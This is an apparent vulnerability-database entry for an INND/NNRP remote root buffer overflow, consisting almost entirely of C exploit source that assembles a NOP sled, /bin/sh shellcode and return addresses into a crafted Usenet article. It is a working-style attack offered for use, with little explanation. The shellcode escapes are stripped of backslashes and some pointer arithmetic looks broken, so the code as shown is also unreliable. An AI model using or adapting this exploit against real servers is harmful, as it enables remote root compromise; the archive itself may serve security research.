INND/NNRP < 1.6.x - Remote Overflow

Vulnerability ID 1053494 Vulnerability type
Published 2000-11-30 Updated 2000-11-30
CVE ID N/A
CNNVD-ID N/A
Platform Linux CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/208
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
/*
 *  INND/NNRP remote root overflow
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET	792
#define BUFFER_SIZE	796
#define ADDRS		80
#define RET			0xefbf95e4
#define NOP			"x08x21x02x80"

int main(argc, argv)
int argc;
char **argv;
{
  char *buff = NULL, *ptr = NULL;
  u_long *addr_ptr = NULL;
  int ofs = DEFAULT_OFFSET;
  int noplen;
  int i, j;
  u_char execshell[] = 
    "x34x16x05x06x96xd6x05x34x20x20x08x01"
    "xe4x20xe0x08x0bx5ax02x9axe8x3fx1fxfd"
    "x08x21x02x80x34x02x01x02x08x41x04x02"
    "x60x40x01x62xb4x5ax01x54x0bx39x02x99"
    "x0bx18x02x98x34x16x04xbex20x20x08x01"
    "xe4x20xe0x08x96xd6x05x34xdexadxcaxfe"
    "/bin/sh";
  
  if(argc > 1)
    ofs = atoi(argv[1]);

  if(!(buff = malloc(4096)))
  {
    (void)fprintf(stderr, "can't allocate memory\n");
    exit(1);
  }

  ptr = buff;
  noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;

  for(i = 0; i < noplen / 4; i++)
  {
    for(j = 0; j < 4; j++)
      *ptr++ = NOP[j];
  }

  *ptr += noplen;

  for(i = 0; i < strlen(execshell); i++)
    *ptr++ = execshell[i];

  addr_ptr = (unsigned long *)ptr;

  for(i = 0; i < ADDRS / 4; i++)
    *addr_ptr++ = (RET - ofs);

  ptr = (char *)addr_ptr;
  *ptr = '\0';

  (void)fprintf(stderr, "shellcode len: %d, RET: %x\n", strlen(buff), RET-ofs);

  printf(
    "Path: babcia!padlina\n"
    "From: babunia @%s\n"
    "Newsgroups: pl.test\n"
    "Subject: test\n"
    "Message-ID: <[email protected]>\n"
    "Date: 26 Aug 1999 10:36:54 +0200\n"
    "Lines: 1\n"
    "\n"
    "west. test it.\n"
    ".\n", buff);
}


// milw0rm.com [2000-11-30]
